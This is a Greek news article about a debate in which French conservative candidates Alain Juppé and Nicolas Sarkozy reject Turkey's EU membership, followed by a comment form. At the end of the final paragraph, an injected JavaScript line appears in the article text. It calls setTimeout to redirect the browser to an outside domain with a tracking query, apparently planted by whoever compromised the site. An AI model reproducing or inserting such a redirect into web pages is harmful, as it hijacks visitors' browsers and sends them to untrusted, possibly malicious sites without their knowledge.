Σαρκοζί – Ζιπέ: Η Τουρκία δεν ανήκει στην ΕΕ

0
5

 

Αν και η Γαλλία επισήμως στηρίζει τις ενταξιακές διαπραγματεύσεις της Τουρκίας με την ΕΕ, οι δύο υποψήφιοι της Δεξιάς για την προεδρία της χώρας Αλέν Ζιπέ και Νικολά Σαρκοζί, σε χθεσινή τηλεοπτική τους αναμέτρηση εξέφρασαν την αντίθεσή τους στη συνέχιση των διαπραγματεύσεων με την Άγκυρα.

Ενόψει του πρώτου γύρου των προκριματικών εκλογών για την ανάδειξη του συντηρητικού υποψηφίου, την Κυριακή και του δεύτερου γύρου μία εβδομάδα αργότερα, οι δύο υποψήφιοι της συντηρητικής παράταξης διασταύρωσαν τα ξίφη τους στο πρώτο ντιμπέιτ.

Ο Ζιπέ που προηγείται στις δημοσκοπήσεις αναφέρθηκε στο θέμα τονίζοντας: «Έχω δηλώσει εδώ και καιρό ότι η Τουρκία δεν ανήκει στην ΕΕ και οι τρέχουσες εξελίξεις στο καθεστώς της χώρας καθιστά αυτό το ενδεχόμενο ακόμη πιο απίθανο» και εξέφρασε την αντίρρησή του για μία συμφωνία μεταξύ ΕΕ και Τουρκίας που θα προβλέπει ότι η Άγκυρα θα συμβάλει στον περιορισμό της μεταναστευτικής ροής προς χώρες της ΕΕ με αντάλλαγμα τη χαλάρωση των όρων για τη χορήγηση της βίζας στα ευρωπαϊκά ταξίδια για τους πολίτες της και την επανέναρξη των ενταξιακών διαπραγματεύσεων.

Σ’ αυτό συμφώνησε και ο Νικολά Σαρκοζί πρώην πρόεδρος της Γαλλίας που επεσήμανε «ήρθε η ώρα να δοθεί ένα τέλος σε όλο αυτό. Η Τουρκία δεν ανήκει στην ΕΕ«.

Ωστόσο ο Ζιπέ τόνισε ότι το μπλοκ θα πρέπει να συνεχίσει τις συνομιλίες με την Τουρκία: «Σαφώς και το τουρκικό καθεστώς δεν εξελίσσεται όπως θα θέλαμε στο δημοκρατικό μέτωπο, αλλά πρόκειται για μία μεγάλη χώρα και για έναν γείτονα με τον οποίο θα πρέπει να εμπλεκόμαστε«. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here